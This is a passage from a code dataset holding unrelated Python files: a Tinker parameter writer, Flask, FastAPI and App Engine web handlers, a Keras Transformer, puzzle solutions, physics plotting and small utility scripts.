int(num2typ2symb[cen_nums[3]][1][5:])\n atom4_type = at_df.ix[cen_nums[3]-3]['OPLSN'] \n\n V2 
= float(row['V2'])\n gamma = 180.0\n n = 2\n\n # ordering for this is weird\n # see https://ryanmrichard.github.io/ForceManII/tinkerformat.html\n prm.write('imptors %7d %4d %4d %4d %12.3f %4.1f %2d \\n' %\n (atom1_type, atom2_type, atom3_central_type, atom4_type, V2, gamma, n))\n prm.write(\n'''\n\n\n ############################\n ## ##\n ## Torsional Parameters ##\n ## ##\n ############################\n\n\n''')\n for index, row in tor_df.iterrows():\n if row['IMP'] == False:\n atom1_type = at_df.ix[row.I-3]['OPLSN']#int(types[int(row['I'])][1].strip('_opls'))\n atom2_type = at_df.ix[row.J-3]['OPLSN']#int(types[int(row['J'])][1].strip('_opls'))\n atom3_type = at_df.ix[row.K-3]['OPLSN']#int(types[int(row['K'])][1].strip('_opls'))\n atom4_type = at_df.ix[row.L-3]['OPLSN']#int(types[int(row['L'])][1].strip('_opls'))\n\n V1 = float(row['V1'])\n gamma1 = 0.0\n n1 = 1\n\n V2 = float(row['V2'])\n gamma2 = 180.0\n n2 = 2\n\n V3 = float(row['V3'])\n gamma3 = 0.0\n n3 = 3\n\n prm.write('torsion %7d %4d %4d %4d %12.3f %4.1f %2d %6.3f %4.1f %2d %6.3f %4.1f %2d \\n' %\n (atom1_type, atom2_type, atom3_type, atom4_type, V1, gamma1, n1, V2, gamma2, n2, V3, gamma3, n3))\n prm.write(\n'''\ntorsion 0 0 0 0 0.000 0.0 1 0.000 180.0 2 0.000 0.0 3\n\n ########################################\n ## ##\n ## Atomic Partial Charge Parameters ##\n ## ##\n ########################################\n\n\n''')\n# types_idx = 0\n for i,r in at_df.iterrows():\n prm.write('charge %11d %16.4f \\n' %\n (r.OPLSN, r.Q))\n\n prm.close()\n return None \n\n#all_dfs = pickle.load(open(\"BNZ_2_PRD.p\", \"rb\")) \n#tinker_prm(all_dfs, resid='A2B')\n","repo_name":"leelasd/AlchemicalAssistant","sub_path":"build/lib/AlchemicalAssistant/TINKER_Rel_FEP.py","file_name":"TINKER_Rel_FEP.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17943506281","text":"from flask import Flask, render_template, request, redirect, url_for, flash, Response\nfrom flask_bootstrap import Bootstrap\nimport boto3\nfrom config import S3_BUCKET, S3_KEY, S3_SECRET_ACCESS_KEY\nimport os\nfrom filters import *\nfrom db import Connect\ndb = Connect()\n\n\ns3 = boto3.client(\n \"s3\",\n aws_access_key_id = S3_KEY,\n aws_secret_access_key = S3_SECRET_ACCESS_KEY\n)\n\napp = Flask(\n __name__,\n static_folder = \"static\",\n static_url_path = \"/\"\n)\nBootstrap(app)\napp.config.from_object(\"config\")\napp.config[\"DEBUG\"]\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\napp.secret_key = os.urandom(16)\n\napp.jinja_env.filters[\"datetimeformat\"] = datetimeformat\napp.jinja_env.filters[\"file_name\"] = file_name\n\n@app.route(\"/\")\ndef index():\n # get photo_name and url from AWS RDS \n # s3_resource = boto3.resource(\"s3\")\n # bucket = s3_resource.Bucket(S3_BUCKET)\n # imgs = bucket.objects.all()\n result = db.get_all_photos()\n return render_template(\"index.html\", imgs = result)\n\n@app.route(\"/upload\", methods = [\"POST\"])\ndef upload():\n # get file and file name\n file = request.files[\"file\"]\n name = request.form[\"file-name\"] + \".\" + file.filename.split(\".\")[1]\n # upload to AWS S3\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(S3_BUCKET)\n bucket.Object(name).put(Body = file)\n # write to AWS RDS\n result = db.insert(name)\n if result == \"insert success\":\n flash(\"File uploaded successfully\")\n return redirect(url_for(\"index\"))\n if result == \"MySQL connection error\":\n flash(\"File name duplicate or other 
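Aside: each proper torsion in the generated `.key` file above is a fixed-width three-term Fourier series -- V1 at phase 0 (n=1), V2 at phase 180 (n=2), V3 at phase 0 (n=3). A standalone formatter mirroring the record's own format string is sketched below; note also that the record uses the long-removed pandas `.ix` indexer, which on current pandas would be spelled `at_df.loc[...]`.

```python
# Sketch of the Tinker torsion record layout used above; type numbers are
# illustrative placeholders.
def torsion_line(t1, t2, t3, t4, v1, v2, v3):
    return ('torsion %7d %4d %4d %4d %12.3f %4.1f %2d %6.3f %4.1f %2d %6.3f %4.1f %2d'
            % (t1, t2, t3, t4, v1, 0.0, 1, v2, 180.0, 2, v3, 0.0, 3))

print(torsion_line(800, 801, 802, 803, 1.300, -0.050, 0.200))
```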
error\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/delete\", methods = [\"POST\"])\ndef delete():\n key = request.form[\"key\"]\n # AWS S3 : delete photo\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(S3_BUCKET)\n bucket.Object(key).delete()\n # AWS RDS : delete record\n result = db.delete(key)\n if result == \"delete success\":\n flash(\"file deleted successfully\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/download\", methods = [\"POST\"])\ndef download():\n key = request.form[\"key\"]\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(S3_BUCKET)\n file_obj = bucket.Object(key).get()\n return Response(\n file_obj[\"Body\"].read(),\n mimetype = \"text/plain\",\n headers = {\n \"Content-Disposition\": \"attachement;filename={}\".format(key.encode(\"utf-8\").decode(\"latin1\"))\n }\n )\n\nif __name__ == \"__main__\":\n app.run(port = 5000)\n","repo_name":"ttiverson3/AWS-S3-CloudFront-RDS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11269040702","text":"def read_input(inpf):\n with open(inpf) as f:\n return [(l.split()[0], int(l.split()[1])) for l in f if l.strip()]\n\n\ndirections = {\n 'R': (1, 0),\n 'U': (0, 1),\n 'L': (-1, 0),\n 'D': (0, -1)\n}\n\n\ndef move(step, pos):\n d, value = step\n dx,dy = directions[d]\n x,y = pos\n\n x,y=(x+dx*value, y+dy*value)\n \n return (x,y)\n\n\nclass Point:\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n \n def distance(self, to_point):\n tx, ty = to_point.x, to_point.y\n return abs(tx-self.x) + abs(ty-self.y)\n \n def no_tension(self, to_point):\n x, y = self.x, self.y\n target = (to_point.x, to_point.y)\n no_tension = (\n (x-1, y-1), (x, y-1), (x+1, y-1),\n (x-1, y), (x,y), (x+1, y),\n (x-1, y+1), (x, y+1), (x+1, y+1),\n )\n return target in no_tension\n \n def move_towards(self, tx, ty):\n dx, dy = tx - self.x, ty - self.y\n dx, dy = dx//abs(dx) if dx else 0, dy//abs(dy) if dy else 0\n x,y = self.x + dx, self.y + dy\n if (self.x, self.y) == (x,y):\n return False\n self.x = x\n self.y = y\n return True\n \n def move_to_node(self, n):\n if self.no_tension(n):\n return False\n return self.move_towards(n.x, n.y)\n\n def __str__(self):\n return '({}, {})'.format(self.x, self.y)\n \n def __repr__(self):\n return self.__str__()\n\n\ndef print_wr(visited, path, rope):\n\n def in_rope(x,y):\n for i, p in enumerate(rope):\n if (x,y) == (p.x, p.y):\n return str(i)\n return None\n\n for y in range(-20,20): #range(ey-sy):\n for x in range(-50,50): #range(ex-sx):\n if in_rope(x, y):\n print(in_rope(x,y), end='')\n elif (x,y) == (0,0):\n print('s', end='')\n elif (x,y) in visited:\n print('#', end='')\n else:\n print('.', end='')\n print()\n\ndef solve(steps, rl=2):\n visited = {(0,0)}\n rope = [Point(0,0) for _ in range(rl)]\n\n for step in steps:\n h = rope[0]\n tx, ty = move(step, (h.x, h.y))\n while True:\n if not h.move_towards(tx, ty):\n break\n prev = h\n for i,p in enumerate(rope[1:]):\n moved = p.move_to_node(prev)\n prev = p\n visited.add((p.x, p.y)) # add the last position, since we're only moving 1 step at a time...\n print_wr(visited, [], rope)\n return len(visited)\n\n\nprint('Part 1: ', solve(read_input('input'), rl=2))\nprint()\nprint('Part 2: ', solve(read_input('input'), 
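Aside: the tail-following rule in the rope-bridge solution above boils down to stepping one cell toward the head along each axis, i.e. taking the integer sign of each coordinate difference. Isolated as a self-contained sketch:

```python
def sign(d: int) -> int:
    return (d > 0) - (d < 0)

def follow(head, tail):
    hx, hy = head
    tx, ty = tail
    if max(abs(hx - tx), abs(hy - ty)) <= 1:
        return tail                       # touching: no tension, stay put
    return (tx + sign(hx - tx), ty + sign(hy - ty))

assert follow((2, 0), (0, 0)) == (1, 0)   # straight pull
assert follow((2, 1), (0, 0)) == (1, 1)   # diagonal catch-up
```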
rl=10))\",\"repo_name\":\"natemago/adventofcode-2022\",\"sub_path\":\"day9-rope-bridge/solution.py\",\"file_name\":\"solution.py\",\"file_ext\":\"py\",\"file_size_in_byte\":2680,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":2,\"dataset\":\"github-code\",\"pt\":\"48\"} +{\"seq_id\":\"37133589620\",\"text\":\"import numpy\n\nclass Graph:\n\n    def __init__(self):\n        # adjacency list: node -> list of neighbours (was a shared class attribute)\n        self.lista = {}\n\n    def add_point(self, a):\n        self.lista[a] = []\n\n    def add_edge(self, a, b):\n        self.lista[a].append(b)\n        self.lista[b].append(a)\n\n    def delete_point(self, a):\n        for i in self.lista:\n            if a in self.lista[i]:\n                self.lista[i].remove(a)\n        self.lista.pop(a)\n\n    def delete_edge(self, a, b):\n        self.lista[a].remove(b)\n        self.lista[b].remove(a)\n\n    def neighbors_edge(self, a):\n        return self.lista[a]\n\n    def dfs(self, a=None):\n        visited = set()\n        bfsResult = []\n\n        def visit(self, v):\n            if v not in visited:\n                visited.add(v)\n                bfsResult.append(v)\n                for x in self.lista[v]:\n                    visit(self, x)\n\n        if a is None:\n            # start from an arbitrary node, not from a neighbour list\n            a = next(iter(self.lista))\n        visit(self, a)\n        print(bfsResult)\n\n    def bfs(self, a=None):\n        visited = []\n        queue = []\n\n        visited.append(a)\n        queue.append(a)\n\n        while queue:\n            s = queue.pop(0)\n\n            for v in self.lista[s]:\n                if v not in visited:\n                    visited.append(v)\n                    queue.append(v)\n        return visited\n\nab = Graph()\nab.add_point(1)\nab.add_point(2)\nab.add_point(3)\nab.add_point(4)\nab.add_edge(4, 3)\nab.add_edge(3, 2)\nab.add_edge(2, 1)\nprint(ab.neighbors_edge(2))\",\"repo_name\":\"dl7lewandowski/JiBAD-Python\",\"sub_path\":\"pythonLab1/Graph.py\",\"file_name\":\"Graph.py\",\"file_ext\":\"py\",\"file_size_in_byte\":1367,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":0,\"dataset\":\"github-code\",\"pt\":\"48\"} +{\"seq_id\":\"2512991029\",\"text\":\"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nn1 = 1\nn2 = 1.14\nsdtDatang = np.arange(0, 90, 0.1)\nteta1 = []\nteta2 = []\ny0 = []\nx0 = np.arange(-5, 100, 1)\nfor i in range(len(x0)):\n    y0.append(0)\n\ndef closestToNum(arr, K):\n    return arr[min(range(len(arr)), key = lambda i: abs(arr[i] - K))]\n\nfor i in sdtDatang:\n    teta1.append(math.radians(i))\n    teta2.append(math.asin((n1/n2)*math.sin(math.radians(i))))\n\nrTE = []\ntTE = []\nrTM = []\ntTM = []\n\nfor i in range(len(teta1)):\n    rTE.append(((n1*math.cos(teta1[i])) - (n2*math.cos(teta2[i]))) / ((n1*math.cos(teta1[i])) + (n2*math.cos(teta2[i]))))\n    tTE.append((2*n1*math.cos(teta1[i]))/(n1*math.cos(teta1[i]) + n2*math.cos(teta2[i])))\n    rTM.append((-(n1*math.cos(teta2[i])) + (n2*math.cos(teta1[i]))) / ((n1*math.cos(teta2[i])) + (n2*math.cos(teta1[i]))))\n    tTM.append((2*n1*math.cos(teta1[i]))/(n1*math.cos(teta2[i]) + n2*math.cos(teta1[i])))\n\nsdtBrewsterModeTM = 0\nfor i in range(len(rTM)):\n    if(rTM[i] == closestToNum(rTM, 0)):\n        sdtBrewsterModeTM = sdtDatang[i]\n\nplt.plot(np.linspace(sdtBrewsterModeTM, sdtBrewsterModeTM), np.linspace(-1, 1), color='#32a68f', linestyle=':', label='Sudut Brewster pada mode TM \\n(n2=%s)'%n2 + ': %s derajat'%sdtBrewsterModeTM)\nplt.plot(np.arange(-5, 100, 1), np.linspace(0, 0, 105), '#000')\nplt.plot(sdtDatang, rTE, label='rTE')\nplt.plot(sdtDatang, tTE, label='tTE')\nplt.plot(sdtDatang, rTM, 'r', label='rTM')\nplt.plot(sdtDatang, tTM, 'g', label='tTM')\nplt.xlabel('Sudut Datang')\nplt.ylabel('t,r')\nplt.legend(loc='center left', bbox_to_anchor=(1, 0.5))\nplt.show()\",\"repo_name\":\"lahiardhan/sudut-brewster\",\"sub_path\":\"sudutBrewster.py\",\"file_name\":\"sudutBrewster.py\",\"file_ext\":\"py\",\"file_size_in_byte\":1562,\"program_lang\":\"python\",\"lang\":\"en\",\"doc_type\":\"code\",\"stars\":0,\"dataset\":\"github-code\",\"pt\":\"48\"} +{\"seq_id\":\"21608176757\",\"text\":\"from itertools import 
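Aside: the Brewster-angle scan in sudutBrewster.py above has a closed form, theta_B = arctan(n2/n1), the incidence at which the TM reflection coefficient vanishes. A quick check against the record's own formulas:

```python
import math

n1, n2 = 1.0, 1.14
theta_b = math.degrees(math.atan(n2 / n1))       # ~48.75 degrees for n2 = 1.14

t1 = math.radians(theta_b)
t2 = math.asin((n1 / n2) * math.sin(t1))         # Snell's law
rTM = (-(n1 * math.cos(t2)) + n2 * math.cos(t1)) / (n1 * math.cos(t2) + n2 * math.cos(t1))
assert abs(rTM) < 1e-12                           # rTM = 0 at Brewster incidence
print(f"Brewster angle: {theta_b:.2f} deg")
```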
combinations\nfrom collections import defaultdict\n\ndef solution(orders:list, course:list) -> list:\n answer = []\n\n for c in course:\n dic = defaultdict(int)\n for order in orders:\n temp = list(combinations(order, c))\n for comb in temp:\n combined = ''.join(sorted(comb))\n dic[combined] += 1\n \n maxFrequency = 0\n for key in dic.keys():\n maxFrequency = max(maxFrequency, dic[key])\n if maxFrequency < 2:\n continue\n \n for key in dic.keys():\n if dic[key] == maxFrequency:\n answer.append(key)\n \n answer.sort()\n return answer\n","repo_name":"alsrl8/DailyPractice","sub_path":"Problems/programmers/메뉴_리뉴얼.py","file_name":"메뉴_리뉴얼.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2616685145","text":"import keras\nimport tensorflow as tf\n\nfrom layers.decoder import Decoder\nfrom layers.encoder import Encoder\n\n\n@keras.saving.register_keras_serializable(package=\"Transformer\")\nclass Transformer(tf.keras.Model):\n def __init__(self, *, num_layers, emb_dim, num_heads, feed_forward,\n input_vocab_size, target_vocab_size, dropout_rate=0.1):\n super().__init__()\n self.encoder = Encoder(num_layers=num_layers, emb_dim=emb_dim,\n num_heads=num_heads, feed_forward=feed_forward,\n vocab_size=input_vocab_size,\n dropout_rate=dropout_rate)\n\n self.decoder = Decoder(num_layers=num_layers, emb_dim=emb_dim,\n num_heads=num_heads, feed_forward=feed_forward,\n vocab_size=target_vocab_size,\n dropout_rate=dropout_rate)\n\n self.dense = tf.keras.layers.Dense(feed_forward)\n self.final_layer = tf.keras.layers.Dense(target_vocab_size, activation = 'softmax')\n\n def call(self, inputs):\n context, x = inputs\n context = self.encoder(context)\n x = self.decoder(x, context)\n x = self.dense(x)\n logits = self.final_layer(x) \n return logits","repo_name":"bmichas/tranformer_project","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43883870235","text":"\"\"\" imports \"\"\"\nfrom datetime import datetime\nfrom fastapi import FastAPI, Query, HTTPException\nfrom db import ConnectDB\nfrom pymongo import ASCENDING, DESCENDING\nfrom model import PaginatedTrades, Paginate, TradeList, emptyTradeList, SortOrder, TradeType\nfrom helpers import parse_cursor, get_trade_object, get_sorted\n\napp = FastAPI()\n\n\n@app.get('/')\ndef get_search_info(search: str | None = None) -> TradeList:\n \"\"\" The search method of the API \"\"\"\n if search is None:\n return emptyTradeList\n else:\n print(f'search query: {search}')\n db = ConnectDB()\n collection = db.get_collection()\n query = {\"$text\": {'$search': f'^\"{search}\"$'}}\n print(query)\n cursor = collection.find(query)\n trades = parse_cursor(cursor)\n print(len(trades))\n response = TradeList(\n content=trades,\n total=len(trades)\n )\n return response\n\n\n@app.get('/trades', response_model=PaginatedTrades)\ndef get_trades_list(\n page: int = 1, page_size: int = Query(10, description='The maximum trades displayed per page.'),\n\n sort: bool = False, order: SortOrder = SortOrder.ASC,\n\n sort_col: int = Query(\n 1, description=\"\"\"\n Sort according to any column.\n values:\n 1: asset_class\n 2: counterparty\n 3: instrument_id\n 4: instrument_name\n 5: trade_date_time\n 6: buySellIndicator\n 7: price\n 8: quantity\n 9: trader\"\"\", lt=10, gt=0\n ),\n\n asset_class: str | None = Query(\n None, 
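Aside: the defaultdict bookkeeping in the menu-renewal solution above can be condensed with `collections.Counter` -- same semantics, fewer passes per course size. Sketch:

```python
from itertools import combinations
from collections import Counter

def best_courses(orders, c):
    counts = Counter(
        ''.join(sorted(comb))
        for order in orders
        for comb in combinations(order, c)
    )
    top = max(counts.values(), default=0)
    if top < 2:            # a course must be ordered by at least two customers
        return []
    return sorted(k for k, v in counts.items() if v == top)

print(best_courses(["ABCFG", "AC", "CDE", "ACDE", "BCFG", "ACDEH"], 2))  # ['AC']
```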
description='Asset class of the trade.'),\n\n end: str | None = Query(\n None, description=\"The maximum date for the tradeDateTime field in ISO 8601 format \\\n (YYYY-MM-DD)\", regex=r'^\\d{4}-\\d{2}-\\d{2}$'),\n\n max_price: int | None = Query(\n None, description='The maximum value for the tradeDetails.price field.'),\n\n min_price: int | None = Query(\n None, description='The minimum value for the tradeDetails.price field.'),\n\n start: str | None = Query(\n None, description=\"The minimum date for the tradeDateTime field in ISO 8601 format \\\n (YYYY-MM-DD)\", regex=r'^\\d{4}-\\d{2}-\\d{2}$'),\n\n trade_type: TradeType | None = Query(\n None, description='The tradeDetails.buySellIndicator is a BUY or SELL')\n) -> HTTPException | PaginatedTrades:\n \"\"\" Getting a paginated list of trades, with advanced[acc. to any of the folders] sorting[asc/desc] and advanced filters.\"\"\"\n\n # Fetch the advanced filtering criteria:\n filters = {}\n\n if asset_class:\n filters['asset_class'] = asset_class\n\n if trade_type:\n filters['trade_details.buySellIndicator'] = trade_type\n\n if end or start:\n\n date_filter = {}\n lst = []\n\n if end:\n lst.append([end, '$lte'])\n\n if start:\n lst.append([start, '$gte'])\n\n for data in lst:\n\n try:\n print('here', type(data[0]), data[0])\n date = datetime.fromisoformat(data[0])\n date_filter[data[1]] = date\n\n except ValueError as err:\n raise HTTPException(status_code=400, detail=str(err)) from err\n\n filters['trade_date_time'] = date_filter\n\n if max_price or min_price:\n\n price_filter = {}\n\n if max_price:\n price_filter['$lte'] = max_price\n\n if min_price:\n price_filter['$gte'] = min_price\n\n filters['trade_details.price'] = price_filter\n\n print('filters provided:', filters)\n # Get the sorting order\n if sort:\n if order is SortOrder.ASC:\n sort_order = ASCENDING\n else:\n sort_order = DESCENDING\n\n # Get the data from db\n db = ConnectDB()\n collection = db.get_collection()\n cursor = collection.find(filters)\n if sort:\n cursor = cursor.sort(get_sorted(sort_col), direction=sort_order)\n trades = parse_cursor(cursor)\n # print(trades)\n total_data_len = len(trades)\n db.close()\n\n # Get the page\n first = (page - 1) * page_size\n last = first + page_size\n\n if last >= total_data_len:\n nxt = None\n\n if page > 1:\n prev = f'/trades?page={page-1}&page_size={page_size}'\n else:\n prev = None\n\n else:\n if page > 1:\n prev = f'/trades?page={page-1}&page_size={page_size}'\n else:\n prev = None\n\n nxt = f'/trades?page={page+1}&page_size={page_size}'\n\n return PaginatedTrades(\n content=trades[first:last],\n total=len(trades),\n count=min(page_size, len(trades[first:])), # On the final page,\n # the count of total results should be exact\n page=page,\n paginate=Paginate(\n previous=prev,\n next=nxt\n )\n )\n\n\n@app.get('/trades/{trade_id}', response_model=TradeList)\ndef get_trade_by_trade_id(trade_id: str):\n \"\"\" getting a trade by its trade_id \"\"\"\n try:\n print('trade_id:', trade_id)\n db = ConnectDB()\n collection = db.get_collection()\n trade = collection.find_one({'trade_id': trade_id})\n # print(trade)\n if trade is None:\n return emptyTradeList\n\n trade = get_trade_object(trade)\n print(trade)\n return TradeList(\n content=trade,\n total=1\n )\n except Exception as exc:\n print(exc)\n finally:\n 
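Aside: the piecewise `$gte`/`$lte` dictionaries assembled above generalize to a single helper; `range_filter` and its `parse` hook are hypothetical names introduced only for this sketch.

```python
from datetime import datetime

def range_filter(lo=None, hi=None, parse=lambda v: v) -> dict:
    out = {}
    if lo is not None:
        out['$gte'] = parse(lo)
    if hi is not None:
        out['$lte'] = parse(hi)
    return out

filters = {}
if price := range_filter(lo=10, hi=100):
    filters['trade_details.price'] = price
if dates := range_filter(lo='2023-01-01', hi='2023-06-30', parse=datetime.fromisoformat):
    filters['trade_date_time'] = dates
print(filters)
```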
db.close()\n","repo_name":"WindBlaze1/FastAPI-Assessment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37137839820","text":"def fibo(n):\r\n result = []\r\n a,b = 0,1\r\n while a < n:\r\n result.append(a)\r\n a,b = b, a+b\r\n return result\r\n\r\ndata = int(input(\"Enter the upper range:\"))\r\n\r\nprint(fibo(data))\r\n","repo_name":"wadekar43/Basic_Programming","sub_path":"Simple Programs/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21958713267","text":"import os\n\nfrom setuptools import find_packages, setup\n\nwith open(os.path.join(\"version.txt\")) as version_file:\n version_from_file = version_file.read().strip()\n\nwith open(\"requirements.txt\") as f_required:\n required = f_required.read().splitlines()\n\nwith open(\"test_requirements.txt\") as f_tests:\n required_for_tests = f_tests.read().splitlines()\n\nsetup(\n name=\"cloudshell-cli\",\n url=\"https://www.quali.com/\",\n author=\"QualiSystems\",\n author_email=\"info@qualisystems.com\",\n packages=find_packages(),\n install_requires=required,\n tests_require=required_for_tests,\n python_requires=\"~=3.7\",\n version=version_from_file,\n package_data={\"\": [\"*.txt\"]},\n description=\"QualiSystems CloudShell CLI support package\",\n long_description=\"QualiSystems CloudShell CLI support package\",\n include_package_data=True,\n)\n","repo_name":"QualiSystems/cloudshell-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"17482531827","text":"import sys\nimport pygame\ndef check_events(ship):\n \"\"\"响应按键和鼠标事件\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n #退出游戏\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ship)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n\ndef check_keydown_events(event, ship):\n \"\"\"相应按键\"\"\"\n if event.key == pygame.K_RIGHT:\n # 向右移动飞船\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n # 向左移动飞船\n ship.moving_left = True\n\ndef check_keyup_events(event, ship):\n \"\"\"松开按键\"\"\"\n if event.key == pygame.K_RIGHT:\n # 停止移动飞船\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n # 停止移动飞船\n ship.moving_left = False\n\ndef update_screen(ai_settings, screen, ship):\n \"\"\"更新屏幕上的图像,并切换到新屏幕\"\"\"\n #每次循环时重绘屏幕\n screen.fill(ai_settings.bg_color)\n ship.blitem()\n #让最近绘制的屏幕可见\n pygame.display.flip()","repo_name":"zhangbin0git/alien_invasion","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40893079819","text":"from google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\nfrom django.utils import simplejson\n\nimport config\nimport models\nimport common\nfrom RequestHandler import RequestHandler\n\nimport os\nimport time\n\nclass GetUpdate(RequestHandler):\n def get_update(self):\n update_id = self.request.get('update_id', None)\n if update_id is not None:\n update_id = int(update_id)\n\n chat_update_id = self.request.get('chat_update_id', 
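Aside: the previous/next link arithmetic in `get_trades_list` above, reduced to a standalone sketch (the route string is illustrative):

```python
def paginate(total, page, page_size, base='/trades'):
    first = (page - 1) * page_size
    last = first + page_size
    prev = f'{base}?page={page - 1}&page_size={page_size}' if page > 1 else None
    nxt = f'{base}?page={page + 1}&page_size={page_size}' if last < total else None
    return first, last, prev, nxt

print(paginate(total=25, page=3, page_size=10))
# (20, 30, '/trades?page=2&page_size=10', None)
```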
None)\n if chat_update_id is not None:\n chat_update_id = int(chat_update_id)\n\n userchat_key = db.Key(self.request.get(\"userchat_key\", None))\n\n chat_id = userchat_key.id_or_name()\n if chat_id:\n peer_id_holder = self.memcache_fetcher.get(config.MEMCACHE_PEER_ID(userchat_key.parent().id_or_name(), chat_id))\n self.login(prev_update_id = update_id, chat_id = chat_id, prev_chat_update_id = chat_update_id)\n\n message = None\n if chat_id:\n if userchat_key.parent() != self.user_key:\n self.response.set_status(404)\n return\n chat_key = db.Key.from_path('Chat', chat_id)\n chat_timestamp = common.str2datetime(self.request.get('chat_timestamp'))\n\n message = self.request.get(\"message\", None)\n\n peer_id = peer_id_holder.get_result()\n if peer_id is None:\n userchat = self.datastore_fetcher.get(userchat_key)\n peer_userchat_key = common.get_ref_key(userchat.get_result(), 'peer_userchat')\n peer_id = peer_userchat_key.parent().id_or_name()\n memcache.set(peer_id_holder.get_key(), peer_id, time = 600)\n\n peer_status = self.memcache_fetcher.get(config.MEMCACHE_LAST_BEEN_ONLINE(peer_id))\n message_entity = None\n if message:\n message = common.htmlize_string(common.sanitize_string(message))\n message_entity = models.Message(parent = chat_key, message_string = message, sender = userchat_key)\n\n peer_chat_open = self.memcache_fetcher.get(config.MEMCACHE_USER_OPEN_CHAT(peer_id, chat_id))\n if peer_chat_open.get_result() is None:\n peer_unreadchat_key = db.Key.from_path('User', peer_id, 'UnreadChat', chat_id)\n peer_unreadchat = models.UnreadChat(key = peer_unreadchat_key)\n\n userchat_holder = self.datastore_fetcher.get(userchat_key)\n peer_userchat_holder = self.datastore_fetcher.get(db.Key.from_path('User', peer_id, 'UserChat', chat_id))\n userchat = userchat_holder.get_result()\n peer_userchat = peer_userchat_holder.get_result()\n userchat.last_updated = self.now\n peer_userchat.last_updated = self.now\n db.put([message_entity, peer_unreadchat, peer_userchat, userchat])\n\n peer_update_id = memcache.incr(config.MEMCACHE_USER_UPDATE_ID(peer_id), initial_value = 0)\n memcache.set(\n config.MEMCACHE_USER_NOTIFICATION(peer_id, peer_update_id),\n {\n 'username' : models.User.get_username(self.user_key),\n 'chat_id' : chat_id,\n 'message' : message,\n 'link' : '/chat/%s' % models.User.get_username(self.user_key),\n 'timestamp' : message_entity.date_time,\n },\n time = config.NOTIFICATION_DURATION,\n )\n else:\n db.put(message_entity)\n\n if self.chat_update_id:\n new_messages = db.Query(models.Message).ancestor(chat_key).filter('date_time >', chat_timestamp).order('-date_time').fetch(10)\n try:\n self.client_update['chat_timestamp'] = str(new_messages[0].date_time)\n except:\n pass\n new_messages.reverse()\n\n template_values = {\n \"username\" : models.User.get_username(self.user_key),\n \"messages\" : [{'message_string': msg.message_string, 'username': models.User.get_username(common.get_ref_key(msg, 'sender').parent())} for msg in new_messages],\n }\n path = os.path.join(os.path.dirname(__file__), '_messages.html')\n self.client_update['messages_html'] = template.render(path, template_values).decode('utf-8')\n elif message_entity is not None:\n self.client_update['chat_timestamp'] = str(message_entity.date_time)\n template_values = {\n \"username\" : models.User.get_username(self.user_key),\n \"messages\" : [{'message_string': message_entity.message_string, 'username': models.User.get_username(common.get_ref_key(message_entity, 'sender').parent())}],\n }\n path = 
os.path.join(os.path.dirname(__file__), '_messages.html')\n self.client_update['messages_html'] = template.render(path, template_values).decode('utf-8')\n\n if chat_id and message_entity:\n self.chat_update_id = memcache.incr(config.MEMCACHE_CHAT_UPDATE_ID(chat_id), delta = 1, initial_value = 0)\n\n self.client_update['status_class'] = \"offline\" if peer_status.get_result() is None else \"online\"\n\n self._get_client_update()\n return self.client_update\n\n def get(self):\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(simplejson.dumps(self.get_update()))\n def post(self):\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(simplejson.dumps(self.get_update()))\n\nclass UpdateContext(RequestHandler):\n def post(self):\n from utils import set_user_context\n context = common.sanitize_string(self.request.get(\"context\").strip()) \n user_key = self.get_current_user_key()\n set_user_context(user_key, context)\n self.response.out.write(context)\n\n","repo_name":"zaidka/peerpalette","sub_path":"peerpalette.com/Ajax.py","file_name":"Ajax.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21485692900","text":"#Jordan Fonseca\n\n#3.1\n\nDNA = input(str(\"Enter the first DNA sequence\")) #Asks user to input 2 DNA strings\nDNA2 = input(str(\"Enter the second DNA sequence\"))\n\nNumMatches = sum(a==b for a, b in zip(DNA, DNA2))\n#sum of the number of times DNA and DNA2 match\n\nprint(NumMatches) #prints the number of matches\n\n#I was not able 